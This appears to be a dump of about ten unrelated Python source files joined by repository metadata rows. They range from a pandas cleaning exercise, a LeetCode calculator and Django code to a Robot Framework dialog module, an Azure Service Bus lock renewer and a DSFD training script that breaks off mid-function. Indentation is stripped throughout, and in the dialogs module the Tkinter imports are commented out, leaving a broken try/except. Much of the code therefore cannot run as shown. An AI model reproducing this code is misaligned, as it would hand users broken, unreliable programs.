from pyUbiForge.misc.file_readers import BaseReader
class Reader(BaseReader):
file_type = '788BAA0D'
def __init__(self, file_object_data_wrapper: FileObjectDataWrapper):
for _ in range(4):
for _ in range(4):
file_object_data_wrapper.read_float_32()
file_object_data_wrapper.out_file_write('\n')
| [
"[email protected]"
] | |
1ccbc85a8f20324d99f2b2eb30db1d21ed445f07 | 1f51c4e89a71ea3fcc2cc921613aacc19e078b69 | /16_Cleaning Data in Python [Part - 1]/02_Text and categorical data problems/06_Removing titles and taking names.py | e3da04a5987946e045f113e8723ed5864fb6283b | [
"MIT"
] | permissive | CodeHemP/CAREER-TRACK-Data-Scientist-with-Python | 871bafbd21c4e754beba31505965572dd8457adc | 13ebb10cf9083343056d5b782957241de1d595f9 | refs/heads/main | 2023-03-26T08:43:37.054410 | 2021-03-22T15:08:12 | 2021-03-22T15:08:12 | 471,015,287 | 1 | 0 | MIT | 2022-03-17T13:52:32 | 2022-03-17T13:52:31 | null | UTF-8 | Python | false | false | 1,407 | py | '''
06 - Removing titles and taking names
While collecting survey respondent metadata in the airlines DataFrame,
the full name of respondents was saved in the full_name column. However
upon closer inspection, you found that a lot of the different names are
prefixed by honorifics such as "Dr.", "Mr.", "Ms." and "Miss".
Your ultimate objective is to create two new columns named first_name and
last_name, containing the first and last names of respondents respectively.
Before doing so however, you need to remove honorifics.
The airlines DataFrame is in your environment, alongside pandas as pd.
Instructions:
- Remove "Dr.", "Mr.", "Miss" and "Ms." from full_name by replacing them with
an empty string "" in that order.
- Run the assert statement using .str.contains() that tests whether full_name
still contains any of the honorifics.
'''
# Replace "Dr." with empty string ""
airlines['full_name'] = airlines['full_name'].str.replace("Dr.", "")
# Replace "Mr." with empty string ""
airlines['full_name'] = airlines['full_name'].str.replace("Mr.", "")
# Replace "Miss" with empty string ""
airlines['full_name'] = airlines['full_name'].str.replace("Miss", "")
# Replace "Ms." with empty string ""
airlines['full_name'] = airlines['full_name'].str.replace("Ms.", "")
# Assert that full_name has no honorifics
assert airlines['full_name'].str.contains('Ms.|Mr.|Miss|Dr.').any() == False
| [
"[email protected]"
] | |
3cd902ce5209b6c7863f07b1602b49859de1031e | 4d2475135f5fc9cea73572b16f59bfdc7232e407 | /prob224_basic_calculator.py | e775df1d9d3e1655e6652d7439cd899e9757ac9c | [] | no_license | Hu-Wenchao/leetcode | 5fa0ae474aadaba372756d234bc5ec397c8dba50 | 31b2b4dc1e5c3b1c53b333fe30b98ed04b0bdacc | refs/heads/master | 2021-06-24T04:57:45.340001 | 2017-06-17T02:33:09 | 2017-06-17T02:33:09 | 45,328,724 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 954 | py | """
Implement a basic calculator to evaluate a simple expression string.
The expression string may contain open ( and closing parentheses ),
the plus + or minus sign -, non-negative integers and empty spaces .
You may assume that the given expression is always valid.
Some examples:
"1 + 1" = 2
" 2-1 + 2 " = 3
"(1+(4+5+2)-3)+(6+8)" = 23
"""
class Solution(object):
def calculate(self, s):
"""
:type s: str
:rtype: int
"""
total = 0
i, signs = 0, [1, 1]
while i < len(s):
c = s[i]
if c.isdigit():
start = i
while i < len(s) and s[i].isdigit():
i += 1
total += signs.pop() * int(s[start:i])
continue
if c in '+-(':
signs.append(signs[-1] * (1, -1)[c == '-'])
elif c == ')':
signs.pop()
i += 1
return total
| [
"[email protected]"
] | |
78cc2c0e6ce7233a114f720346695cd17917852a | f6c051b15e29fbf1501499d5551c0d9237da0852 | /order/migrations/0008_auto_20210108_0304.py | 8fa64fe7e7a2df8ee6ded7dac0bf581c23033732 | [] | no_license | Deepjyoti13/eCommerce | 8e672d2c4b6f708ef4ac1b66521ce72d2fe2cc39 | b0745b8c3a410f7ee8182496c556229748fd3265 | refs/heads/master | 2023-02-25T04:00:47.068320 | 2021-01-24T19:21:13 | 2021-01-24T19:21:13 | 321,396,947 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 560 | py | # Generated by Django 3.1.4 on 2021-01-07 21:34
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('order', '0007_order_tracking'),
]
operations = [
migrations.AlterField(
model_name='order',
name='status',
field=models.CharField(choices=[('New', 'New'), ('Accepted', 'Accepted'), ('Preparing', 'Preparing'), ('On Shipping', 'On Shipping'), ('Completed', 'Completed'), ('Canceled', 'Canceled')], default='New', max_length=50),
),
]
| [
"[email protected]"
] | |
f1c57d57d4175a117e64f2370c9b2da75032aefd | 5cea76d53779d466f19a5cf0b51e003586cc4a7b | /project/chapter29squish/config.py | c0a9c78f74009e17e69d5662bf33698d71ab2bc1 | [] | no_license | evan886/python | 40152fdb4885876189580141abe27a983d04e04d | d33e996e93275f6b347ecc2d30f8efe05accd10c | refs/heads/master | 2021-06-28T12:35:10.793186 | 2021-05-26T14:33:40 | 2021-05-26T14:33:40 | 85,560,342 | 2 | 1 | null | 2017-10-11T05:31:06 | 2017-03-20T09:51:50 | JavaScript | UTF-8 | Python | false | false | 713 | py | # Configuration file for Squish
# -----------------------------
# Feel free to modify the configuration variables below to taste.
# If the game is too fast or too slow, try to modify the speed
# variables.
# Change these to use other images in the game:
banana_image = 'banana.png'
weight_image = 'weight.png'
splash_image = 'weight.png'
#splash_image = 'banana.png'
# Change these to affect the general appearance:
screen_size = 800, 600
background_color = 255, 255, 255
margin = 30
full_screen = 0
#full_screen = 1
#font_size = 68
font_size = 48
# These affect the behavior of the game:
drop_speed = 1
banana_speed = 1
speed_increase = 1
weights_per_level = 10
banana_pad_top = 40
banana_pad_side = 20
| [
"[email protected]"
] | |
9fcb80ebf6ba49d19469342df5512714fae0445e | c7cbbd4b1c1e281cef5f4a0c4e3d4a97cee2241e | /froide/accesstoken/views.py | f7bfb75707d18ad131e30d2a36f10fd8cc21fc26 | [
"MIT"
] | permissive | manonthemat/froide | 078cf78a6eb35226512c0bdfa2ac9043bcc81ad9 | 698c49935eaf2e922f3c9f6a46af0fd545ccbbbb | refs/heads/master | 2020-08-14T08:19:36.215473 | 2019-10-14T19:43:16 | 2019-10-14T19:43:16 | 215,129,869 | 0 | 0 | MIT | 2019-10-14T19:35:49 | 2019-10-14T19:35:49 | null | UTF-8 | Python | false | false | 669 | py | from django.views.decorators.http import require_POST
from django.utils.translation import ugettext_lazy as _
from django.contrib import messages
from froide.helper.utils import render_403, get_redirect
from .forms import ResetTokenForm
@require_POST
def reset_token(request):
if not request.user.is_authenticated:
return render_403(request)
form = ResetTokenForm(data=request.POST, user=request.user)
if form.is_valid():
message = form.save()
messages.add_message(request, messages.SUCCESS, message)
else:
messages.add_message(request, messages.ERROR, _('Failed to reset token.'))
return get_redirect(request)
| [
"[email protected]"
] | |
990b85fea581c3710a827f71f87d0f2bc9447d5f | ef54d37f8a3303013ca7469871a320d303957ed7 | /robo4.2/4.2/lib/python2.7/site-packages/robot/libraries/dialogs_py.py | 252b6948049aa0b01ab2f54bdf4e68c57aabb39a | [] | no_license | richa92/Jenkin_Regression_Testing | d18badfcf16bda682dfe7bcbbd66f54a9a27a58d | 24a74926170cbdfafa47e972644e2fe5b627d8ff | refs/heads/master | 2020-07-12T10:01:59.099137 | 2019-08-27T12:14:53 | 2019-08-27T12:14:53 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,703 | py | # Copyright 2008-2015 Nokia Networks
# Copyright 2016- Robot Framework Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
from threading import currentThread
import time
try:
# from Tkinter import (Button, Entry, Frame, Label, Listbox, TclError,
Toplevel, Tk, BOTH, END, LEFT, W)
except ImportError:
# from tkinter import (Button, Entry, Frame, Label, Listbox, TclError,
Toplevel, Tk, BOTH, END, LEFT, W)
class _TkDialog(Toplevel):
_left_button = 'OK'
_right_button = 'Cancel'
def __init__(self, message, value=None, **extra):
self._prevent_execution_with_timeouts()
self._parent = self._get_parent()
Toplevel.__init__(self, self._parent)
self._initialize_dialog()
self._create_body(message, value, **extra)
self._create_buttons()
self._result = None
def _prevent_execution_with_timeouts(self):
if 'linux' not in sys.platform \
and currentThread().getName() != 'MainThread':
raise RuntimeError('Dialogs library is not supported with '
'timeouts on Python on this platform.')
def _get_parent(self):
parent = Tk()
parent.withdraw()
return parent
def _initialize_dialog(self):
self.title('Robot Framework')
self.grab_set()
self.protocol("WM_DELETE_WINDOW", self._close)
self.bind("<Escape>", self._close)
self.minsize(250, 80)
self.geometry("+%d+%d" % self._get_center_location())
self._bring_to_front()
def grab_set(self, timeout=30):
maxtime = time.time() + timeout
while time.time() < maxtime:
try:
# Fails at least on Linux if mouse is hold down.
return Toplevel.grab_set(self)
except TclError:
pass
raise RuntimeError('Failed to open dialog in %s seconds. One possible '
'reason is holding down mouse button.' % timeout)
def _get_center_location(self):
x = (self.winfo_screenwidth() - self.winfo_reqwidth()) // 2
y = (self.winfo_screenheight() - self.winfo_reqheight()) // 2
return x, y
def _bring_to_front(self):
self.attributes('-topmost', True)
self.attributes('-topmost', False)
def _create_body(self, message, value, **extra):
frame = Frame(self)
Label(frame, text=message, anchor=W, justify=LEFT, wraplength=800).pack(fill=BOTH)
selector = self._create_selector(frame, value, **extra)
if selector:
selector.pack(fill=BOTH)
selector.focus_set()
frame.pack(padx=5, pady=5, expand=1, fill=BOTH)
def _create_selector(self, frame, value):
return None
def _create_buttons(self):
frame = Frame(self)
self._create_button(frame, self._left_button,
self._left_button_clicked)
self._create_button(frame, self._right_button,
self._right_button_clicked)
frame.pack()
def _create_button(self, parent, label, callback):
if label:
button = Button(parent, text=label, width=10, command=callback)
button.pack(side=LEFT, padx=5, pady=5)
def _left_button_clicked(self, event=None):
if self._validate_value():
self._result = self._get_value()
self._close()
def _validate_value(self):
return True
def _get_value(self):
return None
def _close(self, event=None):
# self.destroy() is not enough on Linux
self._parent.destroy()
def _right_button_clicked(self, event=None):
self._result = self._get_right_button_value()
self._close()
def _get_right_button_value(self):
return None
def show(self):
self.wait_window(self)
return self._result
class MessageDialog(_TkDialog):
_right_button = None
class InputDialog(_TkDialog):
def __init__(self, message, default='', hidden=False):
_TkDialog.__init__(self, message, default, hidden=hidden)
def _create_selector(self, parent, default, hidden):
self._entry = Entry(parent, show='*' if hidden else '')
self._entry.insert(0, default)
self._entry.select_range(0, END)
return self._entry
def _get_value(self):
return self._entry.get()
class SelectionDialog(_TkDialog):
def __init__(self, message, values):
_TkDialog.__init__(self, message, values)
def _create_selector(self, parent, values):
self._listbox = Listbox(parent)
for item in values:
self._listbox.insert(END, item)
self._listbox.config(width=0)
return self._listbox
def _validate_value(self):
return bool(self._listbox.curselection())
def _get_value(self):
return self._listbox.get(self._listbox.curselection())
class PassFailDialog(_TkDialog):
_left_button = 'PASS'
_right_button = 'FAIL'
def _get_value(self):
return True
def _get_right_button_value(self):
return False
| [
"[email protected]"
] | |
35dfe86db227e3ebcc4020419a9b458da4804d07 | 7bededcada9271d92f34da6dae7088f3faf61c02 | /pypureclient/flashblade/FB_2_8/models/quota_setting_response.py | 911d109050831d4426d6f40b7851420fcdcd0f2a | [
"BSD-2-Clause"
] | permissive | PureStorage-OpenConnect/py-pure-client | a5348c6a153f8c809d6e3cf734d95d6946c5f659 | 7e3c3ec1d639fb004627e94d3d63a6fdc141ae1e | refs/heads/master | 2023-09-04T10:59:03.009972 | 2023-08-25T07:40:41 | 2023-08-25T07:40:41 | 160,391,444 | 18 | 29 | BSD-2-Clause | 2023-09-08T09:08:30 | 2018-12-04T17:02:51 | Python | UTF-8 | Python | false | false | 3,181 | py | # coding: utf-8
"""
FlashBlade REST API
A lightweight client for FlashBlade REST API 2.8, developed by Pure Storage, Inc. (http://www.purestorage.com/).
OpenAPI spec version: 2.8
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re
import six
import typing
from ....properties import Property
if typing.TYPE_CHECKING:
from pypureclient.flashblade.FB_2_8 import models
class QuotaSettingResponse(object):
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'items': 'list[QuotaSetting]'
}
attribute_map = {
'items': 'items'
}
required_args = {
}
def __init__(
self,
items=None, # type: List[models.QuotaSetting]
):
"""
Keyword args:
items (list[QuotaSetting]): A list of quota settings objects.
"""
if items is not None:
self.items = items
def __setattr__(self, key, value):
if key not in self.attribute_map:
raise KeyError("Invalid key `{}` for `QuotaSettingResponse`".format(key))
self.__dict__[key] = value
def __getattribute__(self, item):
value = object.__getattribute__(self, item)
if isinstance(value, Property):
return None
else:
return value
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
if hasattr(self, attr):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(QuotaSettingResponse, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, QuotaSettingResponse):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| [
"[email protected]"
] | |
0834a5b08c86116c058a156d90a1ff41c16fbe22 | aa0270b351402e421631ebc8b51e528448302fab | /sdk/servicebus/azure-servicebus/azure/servicebus/aio/_async_auto_lock_renewer.py | 0bc36d7b473330ffd0a344b4b93c2976c7fb5cbd | [
"MIT",
"LGPL-2.1-or-later",
"LicenseRef-scancode-generic-cla"
] | permissive | fangchen0601/azure-sdk-for-python | d04a22109d0ff8ff209c82e4154b7169b6cb2e53 | c2e11d6682e368b2f062e714490d2de42e1fed36 | refs/heads/master | 2023-05-11T16:53:26.317418 | 2023-05-04T20:02:16 | 2023-05-04T20:02:16 | 300,440,803 | 0 | 0 | MIT | 2020-10-16T18:45:29 | 2020-10-01T22:27:56 | null | UTF-8 | Python | false | false | 10,532 | py | # ------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
# -------------------------------------------------------------------------
import asyncio
import logging
import datetime
from typing import Optional, Iterable, Any, Union, Callable, Awaitable, List
from .._common.message import ServiceBusReceivedMessage
from ._servicebus_session_async import ServiceBusSession
from ._servicebus_receiver_async import ServiceBusReceiver
from .._common.utils import (
get_renewable_start_time,
utc_now,
get_renewable_lock_duration,
)
from .._common.auto_lock_renewer import SHORT_RENEW_OFFSET, SHORT_RENEW_SCALING_FACTOR
from ._async_utils import get_dict_with_loop_if_needed
from ..exceptions import AutoLockRenewTimeout, AutoLockRenewFailed, ServiceBusError
Renewable = Union[ServiceBusSession, ServiceBusReceivedMessage]
AsyncLockRenewFailureCallback = Callable[
[Renewable, Optional[Exception]], Awaitable[None]
]
_log = logging.getLogger(__name__)
class AutoLockRenewer:
"""Auto lock renew.
An asynchronous AutoLockRenewer handler for renewing the lock
tokens of messages and/or sessions in the background.
:param max_lock_renewal_duration: A time in seconds that locks registered to this renewer
should be maintained for. Default value is 300 (5 minutes).
:type max_lock_renewal_duration: float
:param on_lock_renew_failure: A callback may be specified to be called when the lock is lost on the renewable
that is being registered. Default value is None (no callback).
:type on_lock_renew_failure: Optional[LockRenewFailureCallback]
.. admonition:: Example:
.. literalinclude:: ../samples/async_samples/sample_code_servicebus_async.py
:start-after: [START auto_lock_renew_message_async]
:end-before: [END auto_lock_renew_message_async]
:language: python
:dedent: 4
:caption: Automatically renew a message lock
.. literalinclude:: ../samples/async_samples/sample_code_servicebus_async.py
:start-after: [START auto_lock_renew_session_async]
:end-before: [END auto_lock_renew_session_async]
:language: python
:dedent: 4
:caption: Automatically renew a session lock
"""
def __init__(
self,
max_lock_renewal_duration: float = 300,
on_lock_renew_failure: Optional[AsyncLockRenewFailureCallback] = None,
loop: Optional[asyncio.AbstractEventLoop] = None,
) -> None:
self._internal_kwargs = get_dict_with_loop_if_needed(loop)
self._shutdown = asyncio.Event()
self._futures: List[asyncio.Future] = []
self._sleep_time = 1
self._renew_period = 10
self._on_lock_renew_failure = on_lock_renew_failure
self._max_lock_renewal_duration = max_lock_renewal_duration
async def __aenter__(self) -> "AutoLockRenewer":
if self._shutdown.is_set():
raise ServiceBusError(
"The AutoLockRenewer has already been shutdown. Please create a new instance for"
" auto lock renewing."
)
return self
async def __aexit__(self, *args: Iterable[Any]) -> None:
await self.close()
def _renewable(
self, renewable: Union[ServiceBusReceivedMessage, ServiceBusSession]
) -> bool:
# pylint: disable=protected-access
if self._shutdown.is_set():
return False
if hasattr(renewable, "_settled") and renewable._settled: # type: ignore
return False
if renewable._lock_expired:
return False
try:
if not renewable._receiver._running: # type: ignore
return False
except AttributeError: # If for whatever reason the renewable isn't hooked up to a receiver
raise ServiceBusError(
"Cannot renew an entity without an associated receiver. "
"ServiceBusReceivedMessage and active ServiceBusReceiver.Session objects are expected."
)
return True
async def _auto_lock_renew(
self,
receiver: ServiceBusReceiver,
renewable: Renewable,
starttime: datetime.datetime,
max_lock_renewal_duration: float,
on_lock_renew_failure: Optional[AsyncLockRenewFailureCallback] = None,
renew_period_override: Optional[float] = None,
) -> None:
# pylint: disable=protected-access
_log.debug(
"Running async lock auto-renew for %r seconds", max_lock_renewal_duration
)
error: Optional[Exception] = None
clean_shutdown = False # Only trigger the on_lock_renew_failure if halting was not expected (shutdown, etc)
renew_period = renew_period_override or self._renew_period
try:
while self._renewable(renewable):
if (utc_now() - starttime) >= datetime.timedelta(
seconds=max_lock_renewal_duration
):
_log.debug(
"Reached max auto lock renew duration - letting lock expire."
)
raise AutoLockRenewTimeout(
"Auto-renew period ({} seconds) elapsed.".format(
max_lock_renewal_duration
)
)
if (renewable.locked_until_utc - utc_now()) <= datetime.timedelta(
seconds=renew_period
):
_log.debug(
"%r seconds or less until lock expires - auto renewing.",
renew_period,
)
try:
# Renewable is a session
await renewable.renew_lock() # type: ignore
except AttributeError:
# Renewable is a message
await receiver.renew_message_lock(renewable) # type: ignore
await asyncio.sleep(self._sleep_time)
clean_shutdown = not renewable._lock_expired
except AutoLockRenewTimeout as e:
error = e
renewable.auto_renew_error = e
clean_shutdown = not renewable._lock_expired
except Exception as e: # pylint: disable=broad-except
_log.debug("Failed to auto-renew lock: %r. Closing thread.", e)
error = AutoLockRenewFailed("Failed to auto-renew lock", error=e)
renewable.auto_renew_error = error
finally:
if on_lock_renew_failure and not clean_shutdown:
await on_lock_renew_failure(renewable, error)
def register(
self,
receiver: ServiceBusReceiver,
renewable: Union[ServiceBusReceivedMessage, ServiceBusSession],
max_lock_renewal_duration: Optional[float] = None,
on_lock_renew_failure: Optional[AsyncLockRenewFailureCallback] = None,
) -> None:
"""Register a renewable entity for automatic lock renewal.
:param receiver: The ServiceBusReceiver instance that is associated with the message or the session to
be auto-lock-renewed.
:type receiver: ~azure.servicebus.aio.ServiceBusReceiver
:param renewable: A locked entity that needs to be renewed.
:type renewable: Union[~azure.servicebus.aio.ServiceBusReceivedMessage,~azure.servicebus.aio.ServiceBusSession]
:param max_lock_renewal_duration: A time in seconds that the lock should be maintained for.
Default value is None. If specified, this value will override the default value specified at the constructor.
:type max_lock_renewal_duration: Optional[float]
:param Optional[AsyncLockRenewFailureCallback] on_lock_renew_failure:
An async callback may be specified to be called when the lock is lost on the renewable being registered.
Default value is None (no callback).
:rtype: None
"""
if not isinstance(renewable, (ServiceBusReceivedMessage, ServiceBusSession)):
raise TypeError(
"AutoLockRenewer only supports registration of types "
"azure.servicebus.ServiceBusReceivedMessage (via a receiver's receive methods) and "
"azure.servicebus.aio.ServiceBusSession "
"(via a session receiver's property receiver.session)."
)
if self._shutdown.is_set():
raise ServiceBusError(
"The AutoLockRenewer has already been shutdown. Please create a new instance for"
" auto lock renewing."
)
if renewable.locked_until_utc is None:
raise ValueError(
"Only azure.servicebus.ServiceBusReceivedMessage objects in PEEK_LOCK receive mode may"
"be lock-renewed. (E.g. only messages received via receive() or the receiver iterator,"
"not using RECEIVE_AND_DELETE receive mode, and not returned from Peek)"
)
starttime = get_renewable_start_time(renewable)
# This is a heuristic to compensate if it appears the user has a lock duration less than our base renew period
time_until_expiry = get_renewable_lock_duration(renewable)
renew_period_override = None
# Default is 10 seconds, but let's leave ourselves a small margin of error because clock skew is a real problem
if time_until_expiry <= datetime.timedelta(
seconds=self._renew_period + SHORT_RENEW_OFFSET
):
renew_period_override = (
time_until_expiry.seconds * SHORT_RENEW_SCALING_FACTOR
)
renew_future = asyncio.ensure_future(
self._auto_lock_renew(
receiver,
renewable,
starttime,
max_lock_renewal_duration or self._max_lock_renewal_duration,
on_lock_renew_failure or self._on_lock_renew_failure,
renew_period_override,
),
**self._internal_kwargs
)
self._futures.append(renew_future)
async def close(self) -> None:
"""Cease autorenewal by cancelling any remaining open lock renewal futures."""
self._shutdown.set()
if self._futures:
await asyncio.wait(self._futures)
| [
"[email protected]"
] | |
af8bdce8b06b56c4b156043cf40cb6163573214a | 813212a9a3f211c25c4765795ed252d74b0273dd | /main.py | 1a8a253f008ccfeffd0ee5c0f2d0d54952d151e8 | [] | no_license | Suke0/DSFD_pytorch | 0228963441e75f62f1588e37a22e86c90340a0a9 | a8ae0f4930acdd81e05f73941a8b397daa35c489 | refs/heads/master | 2022-03-19T06:45:32.663406 | 2019-11-19T14:47:38 | 2019-11-19T14:47:38 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 14,535 | py | from __future__ import division
from __future__ import absolute_import
from __future__ import print_function
import os
import time
import shutil
import argparse
import torch
import torch.nn as nn
import torch.optim as optim
import torch.nn.init as init
import torch.utils.data as data
import numpy as np
from torch.autograd import Variable
import torch.distributed as dist
import torch.backends.cudnn as cudnn
from data.config import cfg
from data.widerface import WIDERDetection, detection_collate
from layers.modules import MultiBoxLoss
from layers.functions import PriorBox
from models.factory import build_net, basenet_factory
parser = argparse.ArgumentParser(
description='DSFD face Detector Training With Pytorch')
parser.add_argument('--model',default='vgg', type=str,
choices=['vgg', 'resnet50', 'resnet101', 'resnet152'],
help='model for training')
parser.add_argument('--basenet',default='vgg16_reducedfc.pth',
help='Pretrained base model')
parser.add_argument('--epochs', default=90, type=int, metavar='N',
help='number of total epochs to run')
parser.add_argument('--start-epoch', default=0, type=int, metavar='N',
help='manual epoch number (useful on restarts)')
parser.add_argument('--batch_size',default=2, type=int,
help='Batch size for training')
parser.add_argument('--pretrained', default=True, type=str,
help='use pre-trained model')
parser.add_argument('--resume',default=None, type=str,
help='Checkpoint state_dict file to resume training from')
parser.add_argument('--num_workers',default=4, type=int,
help='Number of workers used in dataloading')
parser.add_argument('--distributed', default=True, type=str,
help='use distribute training')
parser.add_argument("--local_rank", default=0, type=int)
parser.add_argument('--lr', '--learning-rate',default=1e-3, type=float,
help='initial learning rate')
parser.add_argument('--momentum',default=0.9, type=float,
help='Momentum value for optim')
parser.add_argument('--weight_decay',default=5e-4, type=float,
help='Weight decay for SGD')
parser.add_argument('--print-freq', '-p', default=10, type=int,
metavar='N', help='print frequency (default: 10)')
parser.add_argument('--save_folder',default='weights/',
help='Directory for saving checkpoint models')
parser.add_argument('--prefix',default='dsfd_',
help='the prefix for saving checkpoint models')
args = parser.parse_args()
cudnn.benchmark = True
args = parser.parse_args()
minmum_loss = np.inf
args.distributed = False
if 'WORLD_SIZE' in os.environ:
args.distributed = int(os.environ['WORLD_SIZE']) > 1
if not os.path.exists(args.save_folder):
os.mkdir(args.save_folder)
def main():
global args
global minmum_loss
args.gpu = 0
args.world_size = 1
if args.distributed:
args.gpu = args.local_rank % torch.cuda.device_count()
torch.cuda.set_device(args.gpu)
torch.distributed.init_process_group(backend='nccl',
init_method='env://')
args.world_size = torch.distributed.get_world_size()
args.total_batch_size = args.world_size * args.batch_size
# build dsfd network
print("Building net...")
basenet = basenet_factory(args.model)
dsfd_net = build_net('train', cfg.NUM_CLASSES, args.model)
model = dsfd_net
if args.pretrained:
base_weights = torch.load(args.save_folder + args.basenet)
print('Load base network {}'.format(args.save_folder + basenet))
if args.model == 'vgg':
model.vgg.load_state_dict(base_weights)
else:
model.resnet.load_state_dict(base_weights)
# for multi gpu
if args.distributed:
model = torch.nn.parallel.DistributedDataParallel(model)
model = model.cuda()
# optimizer and loss function
optimizer = optim.SGD(model.parameters(), lr=args.lr, momentum=args.momentum,
weight_decay=args.weight_decay)
criterion = MultiBoxLoss(cfg, True)
# optionally resume from a checkpoint
if args.resume:
if os.path.isfile(args.resume):
print("=> loading checkpoint '{}'".format(args.resume))
checkpoint = torch.load(args.resume, map_location=lambda storage, loc: storage.cuda(args.gpu))
args.start_epoch = checkpoint['epoch']
minmum_loss = checkpoint['minmum_loss']
model.load_state_dict(checkpoint['state_dict'])
optimizer.load_state_dict(checkpoint['optimizer'])
print("=> loaded checkpoint '{}' (epoch {})"
.format(args.resume, checkpoint['epoch']))
else:
print("=> no checkpoint found at '{}'".format(args.resume))
else:
print('Initializing weights...')
dsfd_net.extras.apply(dsfd_net.weights_init)
dsfd_net.fpn_topdown.apply(dsfd_net.weights_init)
dsfd_net.fpn_latlayer.apply(dsfd_net.weights_init)
dsfd_net.fpn_fem.apply(dsfd_net.weights_init)
dsfd_net.loc_pal1.apply(dsfd_net.weights_init)
dsfd_net.conf_pal1.apply(dsfd_net.weights_init)
dsfd_net.loc_pal2.apply(dsfd_net.weights_init)
dsfd_net.conf_pal2.apply(dsfd_net.weights_init)
print('Loading wider dataset...')
train_dataset = WIDERDetection(cfg.FACE.TRAIN_FILE, mode='train')
val_dataset = WIDERDetection(cfg.FACE.VAL_FILE, mode='val')
train_loader = data.DataLoader(train_dataset, args.batch_size,
num_workers=args.num_workers,
shuffle=True,
collate_fn=detection_collate,
pin_memory=True)
val_batchsize = args.batch_size // 2
val_loader = data.DataLoader(val_dataset, val_batchsize,
num_workers=args.num_workers,
shuffle=False,
collate_fn=detection_collate,
pin_memory=True)
print('Using the specified args:')
print(args)
# load PriorBox
with torch.no_grad():
priorbox1 = PriorBox(input_size=[640,640], cfg=cfg, pal=1)
priors_pal1 = priorbox1.forward()
priors_pal1 = priors_pal1.cuda()
priorbox2 = PriorBox(input_size=[640,640], cfg=cfg, pal=2)
priors_pal2 = priorbox2.forward()
priors_pal2 = priors_pal2.cuda()
for epoch in range(args.start_epoch, args.epochs):
# train for one epoch
end = time.time()
train_loss = train(train_loader, model, priors_pal1, priors_pal2, criterion, optimizer, epoch)
val_loss = val(val_loader, model, priors_pal1, priors_pal2, criterion)
if args.local_rank == 0:
is_best = val_loss < minmum_loss
minmum_loss = min(val_loss, minmum_loss)
save_checkpoint({
'epoch': epoch + 1,
'state_dict': model.state_dict(),
'best_prec1': minmum_loss,
'optimizer': optimizer.state_dict(),
}, is_best, epoch)
epoch_time = time.time() -end
print('Epoch %s time cost %f' %(epoch, epoch_time))
def train(train_loader, model, priors_pal1, priors_pal2, criterion, optimizer, epoch):
batch_time = AverageMeter()
data_time = AverageMeter()
losses = AverageMeter()
loc_loss = AverageMeter()
cls_loss = AverageMeter()
# switch to train mode
model.train()
end = time.time()
for i, data in enumerate(train_loader, 1):
input, targets = data
train_loader_len = len(train_loader)
adjust_learning_rate(optimizer, epoch, i, train_loader_len)
# measure data loading time
data_time.update(time.time() - end)
input_var = Variable(input.cuda())
target_var = [Variable(ann.cuda(), requires_grad=False) for ann in targets]
# compute output
output = model(input_var)
loss_l_pa1l, loss_c_pal1 = criterion(output[0:2], priors_pal1, target_var)
loss_l_pa12, loss_c_pal2 = criterion(output[2:4], priors_pal2, target_var)
loss = loss_l_pa1l + loss_c_pal1 + loss_l_pa12 + loss_c_pal2
loss_l = loss_l_pa1l + loss_l_pa12
loss_c = loss_c_pal1 + loss_c_pal2
if args.distributed:
reduced_loss = reduce_tensor(loss.data)
reduced_loss_l = reduce_tensor(loss_l.data)
reduced_loss_c = reduce_tensor(loss_c.data)
else:
reduced_loss = loss.data
reduced_loss_l = loss_l.data
reduced_loss_c = loss_c.data
losses.update(to_python_float(reduced_loss), input.size(0))
loc_loss.update(to_python_float(reduced_loss_l), input.size(0))
cls_loss.update(to_python_float(reduced_loss_c), input.size(0))
# compute gradient and do SGD step
optimizer.zero_grad()
loss.backward()
optimizer.step()
torch.cuda.synchronize()
# measure elapsed time
batch_time.update(time.time() - end)
end = time.time()
if args.local_rank == 0 and i % args.print_freq == 0 and i >= 0:
print('Epoch: [{0}][{1}/{2}]\t'
'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\t'
'Speed {3:.3f} ({4:.3f})\t'
'Data {data_time.val:.3f} ({data_time.avg:.3f})\t'
'Loss {loss.val:.4f} ({loss.avg:.4f})\t'
'loc_loss {loc_loss.val:.3f} ({loc_loss.avg:.3f})\t'
'cls_loss {cls_loss.val:.3f} ({cls_loss.avg:.3f})'.format(
epoch, i, train_loader_len,
args.total_batch_size / batch_time.val,
args.total_batch_size / batch_time.avg,
batch_time=batch_time,
data_time=data_time, loss=losses, loc_loss=loc_loss, cls_loss=cls_loss))
return losses.avg
def val(val_loader, model, priors_pal1, priors_pal2, criterion):
batch_time = AverageMeter()
data_time = AverageMeter()
losses = AverageMeter()
loc_loss = AverageMeter()
cls_loss = AverageMeter()
